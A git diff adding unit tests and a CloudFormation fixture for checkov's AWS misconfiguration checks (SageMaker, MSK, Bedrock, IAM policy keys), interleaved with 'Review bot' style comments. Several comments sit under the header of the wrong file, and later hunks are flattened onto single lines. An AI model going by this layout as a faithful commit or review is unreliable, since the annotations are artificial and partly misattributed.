diff --git a/tests/cloudformation/checks/resource/aws/example_SagemakerNotebookInstanceAllowsIMDSv2/SagemakerNotebookInstanceAllowsIMDSv2-PASSED.yaml b/tests/cloudformation/checks/resource/aws/example_SagemakerNotebookInstanceAllowsIMDSv2/SagemakerNotebookInstanceAllowsIMDSv2-PASSED.yaml
new file mode 100644
index 00000000000..2a391df2054
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/example_SagemakerNotebookInstanceAllowsIMDSv2/SagemakerNotebookInstanceAllowsIMDSv2-PASSED.yaml
@@ -0,0 +1,26 @@
+AWSTemplateFormatVersion: '2010-09-09'
+Description: "Create basic notebook instance"
+Resources:
+ BasicNotebookInstancePass:
+ Type: "AWS::SageMaker::NotebookInstance"
+ Properties:
+ InstanceType: "ml.t2.large"
+ RoleArn: !GetAtt ExecutionRole.Arn
+ InstanceMetadataServiceConfiguration:
+ MinimumInstanceMetadataServiceVersion: "2"
+ ExecutionRole:
+ Type: "AWS::IAM::Role"
+ Properties:
+ AssumeRolePolicyDocument:
+ Version: "2012-10-17"
+ Statement:
+ -
+ Effect: "Allow"
+ Principal:
+ Service:
+ - "sagemaker.amazonaws.com"
+ Action:
+ - "sts:AssumeRole"
+ Path: "/"
+ ManagedPolicyArns:
+ - !Sub "arn:${AWS::Partition}:iam::aws:policy/AmazonSageMakerFullAccess"
\ No newline at end of file
diff --git a/tests/cloudformation/checks/resource/aws/test_BedrockAgentEncrypted.py b/tests/cloudformation/checks/resource/aws/test_BedrockAgentEncrypted.py
new file mode 100644
index 00000000000..8debbcb8719
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/test_BedrockAgentEncrypted.py
@@ -0,0 +1,45 @@
+import os
+import unittest
+
+from checkov.cloudformation.checks.resource.aws.BedrockAgentEncrypted import check
+from checkov.cloudformation.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestBedrockAgentEncrypted(unittest.TestCase):
+
+ def test_summary(self):
+ runner = Runner()
+ current_dir = os.path.dirname(os.path.realpath(__file__))
+ test_files_dir = current_dir + "/example_BedrockAgentEncrypted"
+ report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
+ summary = report.get_summary()
+
+ for record in report.failed_checks:
+ self.assertEqual(record.check_id, check.id)
+
+ for record in report.passed_checks:
+ self.assertEqual(record.check_id, check.id)
+
+ passing_resources = {
+ "AWS::Bedrock::Agent.Pass",
+ }
+
+ failing_resources = {
+ "AWS::Bedrock::Agent.Fail",
+
+ }
+
+ passed_check_resources = set([c.resource for c in report.passed_checks])
+ failed_check_resources = set([c.resource for c in report.failed_checks])
+
+ self.assertEqual(summary['passed'], 1)
+ self.assertEqual(summary['failed'], 1)
+ self.assertEqual(summary['skipped'], 0)
+ self.assertEqual(summary['parsing_errors'], 0)
+ self.assertEqual(passing_resources, passed_check_resources)
+ self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == '__main__':
+ unittest.main()
diff --git a/tests/cloudformation/checks/resource/aws/test_CloudsplainingIAMCredentialsExposure.py b/tests/cloudformation/checks/resource/aws/test_CloudsplainingIAMCredentialsExposure.py
index 8c359481e2f..130c2c603a1
--- a/tests/cloudformation/checks/resource/aws/test_CloudsplainingIAMCredentialsExposure.py
+++ b/tests/cloudformation/checks/resource/aws/test_CloudsplainingIAMCredentialsExposure.py
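Review bot: The expected counts are hard-coded as `self.assertEqual(summary['passed'], 1)` / `self.assertEqual(summary['failed'], 1)` even though `passing_resources` and `failing_resources` are declared right above them, so adding a fixture resource later means updating two places; `self.assertEqual(summary['passed'], len(passing_resources))` and `self.assertEqual(summary['failed'], len(failing_resources))` keep the sets as the single source of truth, which is what the sibling test_CognitoUnauthenticatedIdentities.py and the rewritten test_ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py already do. The same hard-coded counts appear in the new test_MSKCluster* and test_SagemakerDataQualityJobDefinition* files further down. Two smaller style points that recur across these new files: `set([c.resource for c in report.passed_checks])` is a list built only to be turned into a set and reads better as `{c.resource for c in report.passed_checks}`, and `current_dir + "/example_BedrockAgentEncrypted"` would be `os.path.join(current_dir, "example_BedrockAgentEncrypted")`. The stray blank line inside the `failing_resources` literal looks like a leftover from a template and can go.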
@@ -19,6 +19,8 @@ def test_summary(self):
 self.assertEqual(summary['failed'], 1)
 self.assertEqual(summary['skipped'], 0)
 self.assertEqual(summary['parsing_errors'], 0)
+ self.assertIn('Properties/PolicyDocument/Statement/[0]/Action/[0]/', report.failed_checks[0].check_result.get('evaluated_keys'))
+ self.assertIn('Properties/PolicyDocument/Statement/[0]/Action/[2]/', report.failed_checks[0].check_result.get('evaluated_keys'))
 if __name__ == '__main__':
diff --git a/tests/cloudformation/checks/resource/aws/test_CloudsplainingIAMGroup.py b/tests/cloudformation/checks/resource/aws/test_CloudsplainingIAMGroup.py
index 67071bf62fc..ced1b5e2904
--- a/tests/cloudformation/checks/resource/aws/test_CloudsplainingIAMGroup.py
+++ b/tests/cloudformation/checks/resource/aws/test_CloudsplainingIAMGroup.py
@@ -23,6 +23,8 @@ def test_summary(self):
 self.assertEqual(summary['failed'], 2)
 self.assertEqual(summary['skipped'], 0)
 self.assertEqual(summary['parsing_errors'], 0)
+ self.assertEqual(report.failed_checks[0].check_result.get('evaluated_keys'), ['Properties/PolicyDocument/Statement/[0]/Action'])
+ self.assertEqual(report.failed_checks[1].check_result.get('evaluated_keys'), ['Properties/PolicyDocument/Statement/[0]/Action/[0]/'])
 if __name__ == '__main__':
diff --git a/tests/cloudformation/checks/resource/aws/test_CloudsplainingIAMRole.py b/tests/cloudformation/checks/resource/aws/test_CloudsplainingIAMRole.py
index 7ca4d4db0b1..c3c08d19fb1
--- a/tests/cloudformation/checks/resource/aws/test_CloudsplainingIAMRole.py
+++ b/tests/cloudformation/checks/resource/aws/test_CloudsplainingIAMRole.py
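Review bot: The new assertions address `report.failed_checks[0]` and `report.failed_checks[1]` by position without first pinning which resource each record is, so they depend on the runner's record ordering rather than on the check's behaviour for a given resource; a preceding `self.assertEqual(report.failed_checks[0].resource, "<expected resource id>")` (or a lookup by `.resource` instead of an index) would make the intent explicit and the failure message useful if the order ever changes. In the test_CloudsplainingIAMGroup.py hunk the two frozen values differ in shape, `.../Action` for one record and `.../Action/[0]/` with a trailing slash for the other, which is presumably the check reporting the whole list in one case and a single element in the other; that inconsistency in the `evaluated_keys` format is now locked in by the test, and a one-line comment such as `# whole Action list vs. single element path, see <check module>` would keep a future reader from "fixing" it. The same positional pattern is repeated in the test_CloudsplainingIAMRole.py, test_CloudsplainingIAMUser.py, test_CloudsplainingManagedPolicy.py, test_ECRPolicy.py, test_IAMPermissionsManagement.py and test_IAMWriteAccess.py hunks. `test_summary` begins and ends outside these hunks.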
@@ -23,6 +23,8 @@ def test_summary(self):
 self.assertEqual(summary['failed'], 2)
 self.assertEqual(summary['skipped'], 0)
 self.assertEqual(summary['parsing_errors'], 0)
+ self.assertEqual(report.failed_checks[0].check_result.get('evaluated_keys'), ['Properties/PolicyDocument/Statement/[0]/Action'])
+ self.assertEqual(report.failed_checks[1].check_result.get('evaluated_keys'), ['Properties/PolicyDocument/Statement/[0]/Action/[0]/'])
 if __name__ == '__main__':
diff --git a/tests/cloudformation/checks/resource/aws/test_CloudsplainingIAMUser.py b/tests/cloudformation/checks/resource/aws/test_CloudsplainingIAMUser.py
index 3dd208e9617..b0cc2a3f225
--- a/tests/cloudformation/checks/resource/aws/test_CloudsplainingIAMUser.py
+++ b/tests/cloudformation/checks/resource/aws/test_CloudsplainingIAMUser.py
@@ -23,6 +23,8 @@ def test_summary(self):
 self.assertEqual(summary['failed'], 2)
 self.assertEqual(summary['skipped'], 0)
 self.assertEqual(summary['parsing_errors'], 0)
+ self.assertEqual(report.failed_checks[0].check_result.get('evaluated_keys'), ['Properties/PolicyDocument/Statement/[0]/Action'])
+ self.assertEqual(report.failed_checks[1].check_result.get('evaluated_keys'), ['Properties/PolicyDocument/Statement/[0]/Action/[0]/'])
 if __name__ == '__main__':
diff --git a/tests/cloudformation/checks/resource/aws/test_CloudsplainingManagedPolicy.py b/tests/cloudformation/checks/resource/aws/test_CloudsplainingManagedPolicy.py
index 17a71d0f59c..9af93a0235e
--- a/tests/cloudformation/checks/resource/aws/test_CloudsplainingManagedPolicy.py
+++ b/tests/cloudformation/checks/resource/aws/test_CloudsplainingManagedPolicy.py
@@ -23,6 +23,9 @@ def test_summary(self):
 self.assertEqual(summary['failed'], 3)
 self.assertEqual(summary['skipped'], 0)
 self.assertEqual(summary['parsing_errors'], 0)
+ self.assertEqual(report.failed_checks[0].check_result.get('evaluated_keys'), ['Properties/PolicyDocument/Statement/[0]/Action'])
+ self.assertEqual(report.failed_checks[1].check_result.get('evaluated_keys'), ['Properties/PolicyDocument/Statement/[0]/Action/[0]/'])
+ self.assertEqual(report.failed_checks[2].check_result.get('evaluated_keys'), ['Properties/PolicyDocument/Statement/[0]/Action/[0]/'])
 if __name__ == '__main__':
diff --git a/tests/cloudformation/checks/resource/aws/test_CognitoUnauthenticatedIdentities.py b/tests/cloudformation/checks/resource/aws/test_CognitoUnauthenticatedIdentities.py
new file mode 100644
index 00000000000..cdba703f9f7
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/test_CognitoUnauthenticatedIdentities.py
@@ -0,0 +1,46 @@
+import os
+import unittest
+
+from checkov.cloudformation.checks.resource.aws.CognitoUnauthenticatedIdentities import check
+from checkov.cloudformation.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestCognitoUnauthenticatedIdentities(unittest.TestCase):
+
+ def test_summary(self):
+ runner = Runner()
+ current_dir = os.path.dirname(os.path.realpath(__file__))
+
+ test_files_dir = current_dir + "/example_CognitoUnauthenticatedIdentities"
+ report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
+ summary = report.get_summary()
+
+ for record in report.failed_checks:
+ self.assertEqual(record.check_id, check.id)
+
+ for record in report.passed_checks:
+ self.assertEqual(record.check_id, check.id)
+
+ passing_resources = {
+ "AWS::Cognito::IdentityPool.Pass",
+ }
+
+ failing_resources = {
+ "AWS::Cognito::IdentityPool.Fail",
+
+ }
+
+ passed_check_resources = set([c.resource for c in report.passed_checks])
+ failed_check_resources = set([c.resource for c in report.failed_checks])
+
+ self.assertEqual(summary['passed'], len(passing_resources))
+ self.assertEqual(summary['failed'], len(failing_resources))
+ self.assertEqual(summary['skipped'], 0)
+ self.assertEqual(summary['parsing_errors'], 0)
+ self.assertEqual(passing_resources, passed_check_resources)
+ self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == '__main__':
+ unittest.main()
diff --git a/tests/cloudformation/checks/resource/aws/test_ECRPolicy.py b/tests/cloudformation/checks/resource/aws/test_ECRPolicy.py
index 09987b8366c..c618dad1222
--- a/tests/cloudformation/checks/resource/aws/test_ECRPolicy.py
+++ b/tests/cloudformation/checks/resource/aws/test_ECRPolicy.py
@@ -35,6 +35,8 @@ def test_summary(self):
 self.assertEqual(summary['failed'], len(failing_resources))
 self.assertEqual(summary['skipped'], 0)
 self.assertEqual(summary['parsing_errors'], 0)
+ self.assertEqual(report.failed_checks[0].check_result.get('evaluated_keys'),
+ ['Properties/RepositoryPolicyText/Statement/[0]/Principal/AWS/[2]/'])
 self.assertEqual(passing_resources, passed_check_resources)
 self.assertEqual(failing_resources, failed_check_resources)
diff --git a/tests/cloudformation/checks/resource/aws/test_ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py b/tests/cloudformation/checks/resource/aws/test_ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py
index caaa9dab012..49a069de7a8
--- a/tests/cloudformation/checks/resource/aws/test_ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py
+++ b/tests/cloudformation/checks/resource/aws/test_ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py
@@ -16,10 +16,25 @@ def test_summary(self):
 report = runner.run(root_folder=test_files_dir,runner_filter=RunnerFilter(checks=[check.id]))
 summary = report.get_summary()
- self.assertEqual(summary['passed'], 1)
- self.assertEqual(summary['failed'], 1)
- self.assertEqual(summary['skipped'], 0)
- self.assertEqual(summary['parsing_errors'], 0)
+ passing_resources = {
+ "AWS::ElastiCache::ReplicationGroup.ReplicationGroupPass",
+ "AWS::ElastiCache::ReplicationGroup.ReplicationGroupPass2",
+ }
+ failing_resources = {
+ "AWS::ElastiCache::ReplicationGroup.ReplicationGroupFail",
+ "AWS::ElastiCache::ReplicationGroup.ReplicationGroupFail2",
+ }
+
+ passed_check_resources = set([c.resource for c in report.passed_checks])
+ failed_check_resources = set([c.resource for c in report.failed_checks])
+
+ self.assertEqual(summary["passed"], len(passing_resources))
+ self.assertEqual(summary["failed"], len(failing_resources))
+ self.assertEqual(summary["skipped"], 0)
+ self.assertEqual(summary["parsing_errors"], 0)
+
+ self.assertEqual(passing_resources, passed_check_resources)
+ self.assertEqual(failing_resources, failed_check_resources)
 if __name__ == '__main__':
diff --git a/tests/cloudformation/checks/resource/aws/test_IAMPermissionsManagement.py b/tests/cloudformation/checks/resource/aws/test_IAMPermissionsManagement.py
index ec1a5c8646d..507a2c858e3
--- a/tests/cloudformation/checks/resource/aws/test_IAMPermissionsManagement.py
+++ b/tests/cloudformation/checks/resource/aws/test_IAMPermissionsManagement.py
@@ -20,6 +20,9 @@ def test_summary(self):
 self.assertEqual(summary['failed'], 3)
 self.assertEqual(summary['skipped'], 0)
 self.assertEqual(summary['parsing_errors'], 0)
+ self.assertEqual(report.failed_checks[0].check_result.get('evaluated_keys'), ['Properties/PolicyDocument/Statement/[0]/Action'])
+ self.assertEqual(report.failed_checks[1].check_result.get('evaluated_keys'), ['Properties/PolicyDocument/Statement/[0]/Action/[0]/'])
+ self.assertEqual(report.failed_checks[2].check_result.get('evaluated_keys'), ['Properties/PolicyDocument/Statement/[0]/Action/[0]/'])
 if __name__ == '__main__':
diff --git a/tests/cloudformation/checks/resource/aws/test_IAMWriteAccess.py b/tests/cloudformation/checks/resource/aws/test_IAMWriteAccess.py
index c53b410efcc..b9c53f5556b
--- a/tests/cloudformation/checks/resource/aws/test_IAMWriteAccess.py
+++ b/tests/cloudformation/checks/resource/aws/test_IAMWriteAccess.py
@@ -20,6 +20,9 @@ def test_summary(self):
 self.assertEqual(summary['failed'], 3)
 self.assertEqual(summary['skipped'], 0)
 self.assertEqual(summary['parsing_errors'], 0)
+ self.assertEqual(report.failed_checks[0].check_result.get('evaluated_keys'), ['Properties/PolicyDocument/Statement/[0]/Action'])
+ self.assertEqual(report.failed_checks[1].check_result.get('evaluated_keys'), ['Properties/PolicyDocument/Statement/[0]/Action/[0]/'])
+ self.assertEqual(report.failed_checks[2].check_result.get('evaluated_keys'), ['Properties/PolicyDocument/Statement/[0]/Action/[0]/'])
 if __name__ == '__main__':
diff --git a/tests/cloudformation/checks/resource/aws/test_MSKClusterEncryption.py b/tests/cloudformation/checks/resource/aws/test_MSKClusterEncryption.py
new file mode 100644
index 00000000000..8cc3acafcf3
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/test_MSKClusterEncryption.py
@@ -0,0 +1,39 @@
+import os
+import unittest
+
+from checkov.cloudformation.checks.resource.aws.MSKClusterEncryption import check
+from checkov.cloudformation.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestMSKClusterEncryption(unittest.TestCase):
+ def test_summary(self):
+ runner = Runner()
+ current_dir = os.path.dirname(os.path.realpath(__file__))
+
+ test_files_dir = current_dir + "/example_MSKClusterEncryption"
+ report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
+ summary = report.get_summary()
+
+ passing_resources = {
+ "AWS::MSK::Cluster.MSKClusterPASSTLS",
+ }
+ failing_resources = {
+ "AWS::MSK::Cluster.MSKClusterFAILskip",
+ "AWS::MSK::Cluster.MSKClusterFAILnotTLS",
+ }
+
+ passed_check_resources = set([c.resource for c in report.passed_checks])
+ failed_check_resources = set([c.resource for c in report.failed_checks])
+
+ self.assertEqual(summary["passed"], 1)
+ self.assertEqual(summary["failed"], 2)
+ self.assertEqual(summary["skipped"], 0)
+ self.assertEqual(summary["parsing_errors"], 0)
+
+ self.assertEqual(passing_resources, passed_check_resources)
+ self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+ unittest.main()
\ No newline at end of file
diff --git a/tests/cloudformation/checks/resource/aws/test_MSKClusterLogging.py b/tests/cloudformation/checks/resource/aws/test_MSKClusterLogging.py
new file mode 100644
index 00000000000..2798eb2f2e6
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/test_MSKClusterLogging.py
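Review bot: The file is added without a trailing newline (`\ No newline at end of file` after `unittest.main()`), as are test_MSKClusterLogging.py and test_MSKClusterNodesArePrivate.py in the next two hunks, while the other new test files in this commit end with one; the flake8 config in this same commit selects `W` codes, so W292 would flag these unless the `tests/*` exclusion keeps them out of linting. Worth a newline on each so the files are consistent with their siblings. The resource name `MSKClusterFAILskip` in `failing_resources` reads as if a skip annotation were involved, yet `summary["skipped"]` is asserted to be 0; if the suffix means "encryption block omitted", a name such as `MSKClusterFAILmissing` in the fixture, or a short `# FAILskip: encryption block omitted entirely` comment here, would avoid the double meaning.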
@@ -0,0 +1,40 @@
+import os
+import unittest
+
+from checkov.cloudformation.checks.resource.aws.MSKClusterLogging import check
+from checkov.cloudformation.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestMSKClusterLogging(unittest.TestCase):
+ def test_summary(self):
+ runner = Runner()
+ current_dir = os.path.dirname(os.path.realpath(__file__))
+
+ test_files_dir = current_dir + "/example_MSKClusterLogging"
+ report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
+ summary = report.get_summary()
+
+ passing_resources = {
+ "AWS::MSK::Cluster.MSKClusterPASS",
+ "AWS::MSK::Cluster.MSKClusterPASSskip",
+ }
+ failing_resources = {
+ "AWS::MSK::Cluster.MSKClusterFAILempty",
+ "AWS::MSK::Cluster.MSKClusterFAILdeclared",
+ }
+
+ passed_check_resources = set([c.resource for c in report.passed_checks])
+ failed_check_resources = set([c.resource for c in report.failed_checks])
+
+ self.assertEqual(summary["passed"], 2)
+ self.assertEqual(summary["failed"], 2)
+ self.assertEqual(summary["skipped"], 0)
+ self.assertEqual(summary["parsing_errors"], 0)
+
+ self.assertEqual(passing_resources, passed_check_resources)
+ self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+ unittest.main()
\ No newline at end of file
diff --git a/tests/cloudformation/checks/resource/aws/test_MSKClusterNodesArePrivate.py b/tests/cloudformation/checks/resource/aws/test_MSKClusterNodesArePrivate.py
new file mode 100644
index 00000000000..2d58996cf3b
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/test_MSKClusterNodesArePrivate.py
@@ -0,0 +1,40 @@
+import os
+import unittest
+
+from checkov.cloudformation.checks.resource.aws.MSKClusterNodesArePrivate import check
+from checkov.cloudformation.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestMSKClusterNodesArePrivate(unittest.TestCase):
+ def test_summary(self):
+ runner = Runner()
+ current_dir = os.path.dirname(os.path.realpath(__file__))
+
+ test_files_dir = current_dir + "/example_MSKClusterNodesArePrivate"
+ report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
+ summary = report.get_summary()
+
+ passing_resources = {
+ "AWS::MSK::Cluster.MSKClusterPASS",
+ "AWS::MSK::Cluster.MSKClusterPASS2"
+ }
+ failing_resources = {
+ "AWS::MSK::Cluster.MSKCluster",
+ "AWS::MSK::Cluster.MSKCluster2"
+ }
+
+ passed_check_resources = set([c.resource for c in report.passed_checks])
+ failed_check_resources = set([c.resource for c in report.failed_checks])
+
+ self.assertEqual(summary["passed"], 2)
+ self.assertEqual(summary["failed"], 2)
+ self.assertEqual(summary["skipped"], 0)
+ self.assertEqual(summary["parsing_errors"], 0)
+
+ self.assertEqual(passing_resources, passed_check_resources)
+ self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+ unittest.main()
\ No newline at end of file
diff --git a/tests/cloudformation/checks/resource/aws/test_SagemakerDataQualityJobDefinitionEncryption.py b/tests/cloudformation/checks/resource/aws/test_SagemakerDataQualityJobDefinitionEncryption.py
new file mode 100644
index 00000000000..4c99ce775a1
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/test_SagemakerDataQualityJobDefinitionEncryption.py
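Review bot: The failing resources are named `MSKCluster` and `MSKCluster2` while the passing ones carry a `PASS` suffix, which breaks the PASS/FAIL naming the other new MSK tests and their fixtures follow and makes the `failing_resources` set read as if it were the default case rather than the negative one; renaming them `MSKClusterFAIL` / `MSKClusterFAIL2` in the fixture and here would keep the convention. The two set literals also drop the trailing comma after their last element (`"AWS::MSK::Cluster.MSKClusterPASS2"`), unlike the sibling files, which is the usual source of a missing-comma bug when a third entry is appended.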
@@ -0,0 +1,39 @@
+import os
+import unittest
+
+from checkov.cloudformation.checks.resource.aws.SagemakerDataQualityJobDefinitionEncryption import check
+from checkov.cloudformation.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestSagemakerDataQualityJobDefinitionEncryption(unittest.TestCase):
+
+ def test_summary(self):
+ runner = Runner()
+ current_dir = os.path.dirname(os.path.realpath(__file__))
+
+ test_files_dir = current_dir + "/example_SagemakerDataQualityJobDefinitionEncryption"
+ report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
+ summary = report.get_summary()
+
+ passing_resources = {
+ "AWS::SageMaker::DataQualityJobDefinition.MyDataQualityJobDefinitionPass",
+ }
+ failing_resources = {
+ "AWS::SageMaker::DataQualityJobDefinition.MyDataQualityJobDefinitionFail",
+ }
+
+ passed_check_resources = set([c.resource for c in report.passed_checks])
+ failed_check_resources = set([c.resource for c in report.failed_checks])
+
+ self.assertEqual(summary["passed"], 1)
+ self.assertEqual(summary["failed"], 1)
+ self.assertEqual(summary["skipped"], 0)
+ self.assertEqual(summary["parsing_errors"], 0)
+
+ self.assertEqual(passing_resources, passed_check_resources)
+ self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+ unittest.main()
diff --git a/tests/cloudformation/checks/resource/aws/test_SagemakerDataQualityJobDefinitionTrafficEncryption.py b/tests/cloudformation/checks/resource/aws/test_SagemakerDataQualityJobDefinitionTrafficEncryption.py
new file mode 100644
index 00000000000..ca37371329c
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/test_SagemakerDataQualityJobDefinitionTrafficEncryption.py
@@ -0,0 +1,40 @@ +import os +import unittest + +from checkov.cloudformation.checks.resource.aws.SagemakerDataQualityJobDefinitionTrafficEncryption import check +from checkov.cloudformation.runner import Runner +from checkov.runner_filter import RunnerFilter + + +class TestSagemakerDataQualityJobDefinitionTrafficEncryption(unittest.TestCase): + + def test_summary(self): + runner = Runner() + current_dir = os.path.dirname(os.path.realpath(__file__)) + + test_files_dir = current_dir + "/example_SagemakerDataQualityJobDefinitionTrafficEncryption" + report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id])) + summary = report.get_summary() + + passing_resources = { + "AWS::SageMaker::DataQualityJobDefinition.DataQualityJobDefinitionPass", + } + failing_resources = { + "AWS::SageMaker::DataQualityJobDefinition.DataQualityJobDefinitionFail1", + "AWS::SageMaker::DataQualityJobDefinition.DataQualityJobDefinitionFail2", + } + + passed_check_resources = set([c.resource for c in report.passed_checks]) + failed_check_resources = set([c.resource for c in report.failed_checks]) + + self.assertEqual(summary["passed"], 1) + self.assertEqual(summary["failed"], 2) + self.assertEqual(summary["skipped"], 0) + self.assertEqual(summary["parsing_errors"], 0) + + self.assertEqual(passing_resources, passed_check_resources) + self.assertEqual(failing_resources, failed_check_resources) + + +if __name__ == "__main__": + unittest.main() diff --git a/tests/cloudformation/checks/resource/aws/test_SagemakerDataQualityJobDefinitionVolumeEncryption.py b/tests/cloudformation/checks/resource/aws/test_SagemakerDataQualityJobDefinitionVolumeEncryption.py new file mode 100644 index 00000000000..1b1218f2ec2 --- /dev/null +++ b/tests/cloudformation/checks/resource/aws/test_SagemakerDataQualityJobDefinitionVolumeEncryption.py 
@@ -0,0 +1,40 @@ +import os +import unittest + +from checkov.cloudformation.checks.resource.aws.SagemakerDataQualityJobDefinitionVolumeEncryption import check +from checkov.cloudformation.runner import Runner +from checkov.runner_filter import RunnerFilter + + +class TestSagemakerDataQualityJobDefinitionVolumeEncryption(unittest.TestCase): + + def test_summary(self): + runner = Runner() + current_dir = os.path.dirname(os.path.realpath(__file__)) + + test_files_dir = current_dir + "/example_SagemakerDataQualityJobDefinitionVolumeEncryption" + report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id])) + summary = report.get_summary() + + passing_resources = { + "AWS::SageMaker::DataQualityJobDefinition.MyDataQualityJobDefinitionPass", + } + failing_resources = { + "AWS::SageMaker::DataQualityJobDefinition.MyDataQualityJobDefinitionFail1", + "AWS::SageMaker::DataQualityJobDefinition.MyDataQualityJobDefinitionFail2", + } + + passed_check_resources = set([c.resource for c in report.passed_checks]) + failed_check_resources = set([c.resource for c in report.failed_checks]) + + self.assertEqual(summary["passed"], 1) + self.assertEqual(summary["failed"], 2) + self.assertEqual(summary["skipped"], 0) + self.assertEqual(summary["parsing_errors"], 0) + + self.assertEqual(passing_resources, passed_check_resources) + self.assertEqual(failing_resources, failed_check_resources) + + +if __name__ == "__main__": + unittest.main() diff --git a/tests/cloudformation/checks/resource/aws/test_SagemakerModelWithNetworkIsolation.py b/tests/cloudformation/checks/resource/aws/test_SagemakerModelWithNetworkIsolation.py new file mode 100644 index 00000000000..d5775afd38a --- /dev/null +++ b/tests/cloudformation/checks/resource/aws/test_SagemakerModelWithNetworkIsolation.py 
@@ -0,0 +1,40 @@ +import os +import unittest + +from checkov.cloudformation.checks.resource.aws.SagemakerModelWithNetworkIsolation import check +from checkov.cloudformation.runner import Runner +from checkov.runner_filter import RunnerFilter + + +class TestSagemakerModelWithNetworkIsolation(unittest.TestCase): + + def test_summary(self): + runner = Runner() + current_dir = os.path.dirname(os.path.realpath(__file__)) + + test_files_dir = current_dir + "/example_SagemakerModelWithNetworkIsolation" + report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id])) + summary = report.get_summary() + + passing_resources = { + "AWS::SageMaker::Model.SageMakerModelPass", + } + failing_resources = { + "AWS::SageMaker::Model.SageMakerModelFail1", + "AWS::SageMaker::Model.SageMakerModelFail2", + } + + passed_check_resources = set([c.resource for c in report.passed_checks]) + failed_check_resources = set([c.resource for c in report.failed_checks]) + + self.assertEqual(summary["passed"], 1) + self.assertEqual(summary["failed"], 2) + self.assertEqual(summary["skipped"], 0) + self.assertEqual(summary["parsing_errors"], 0) + + self.assertEqual(passing_resources, passed_check_resources) + self.assertEqual(failing_resources, failed_check_resources) + + +if __name__ == "__main__": + unittest.main() diff --git a/tests/cloudformation/checks/resource/aws/test_SagemakerNotebookEncryptedWithCMK.py b/tests/cloudformation/checks/resource/aws/test_SagemakerNotebookEncryptedWithCMK.py new file mode 100644 index 00000000000..1c46768d336 --- /dev/null +++ b/tests/cloudformation/checks/resource/aws/test_SagemakerNotebookEncryptedWithCMK.py 
@@ -0,0 +1,41 @@ +import os +import unittest + +from checkov.cloudformation.checks.resource.aws.SagemakerNotebookEncryptedWithCMK import check +from checkov.cloudformation.runner import Runner +from checkov.runner_filter import RunnerFilter + + +class TestSagemakerNotebookEncryptedWithCMK(unittest.TestCase): + + def test_summary(self): + runner = Runner() + current_dir = os.path.dirname(os.path.realpath(__file__)) + + test_files_dir = current_dir + "/example_SagemakerNotebookEncryptedWithCMK" + report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id])) + summary = report.get_summary() + + passing_resources = { + "AWS::SageMaker::NotebookInstance.BasicNotebookInstancePASS", + "AWS::SageMaker::Domain.BasicDomainPASS" + } + failing_resources = { + "AWS::SageMaker::NotebookInstance.BasicNotebookInstanceFAIL", + "AWS::SageMaker::Domain.BasicDomainFAIL" + } + + passed_check_resources = set([c.resource for c in report.passed_checks]) + failed_check_resources = set([c.resource for c in report.failed_checks]) + + self.assertEqual(summary["passed"], len(passing_resources)) + self.assertEqual(summary["failed"], len(failing_resources)) + self.assertEqual(summary["skipped"], 0) + self.assertEqual(summary["parsing_errors"], 0) + + self.assertEqual(passing_resources, passed_check_resources) + self.assertEqual(failing_resources, failed_check_resources) + + +if __name__ == "__main__": + unittest.main() diff --git a/tests/cloudformation/checks/resource/aws/test_SagemakerNotebookInstanceAllowsIMDSv2.py b/tests/cloudformation/checks/resource/aws/test_SagemakerNotebookInstanceAllowsIMDSv2.py new file mode 100644 index 00000000000..ace3e92f30b --- /dev/null +++ b/tests/cloudformation/checks/resource/aws/test_SagemakerNotebookInstanceAllowsIMDSv2.py 
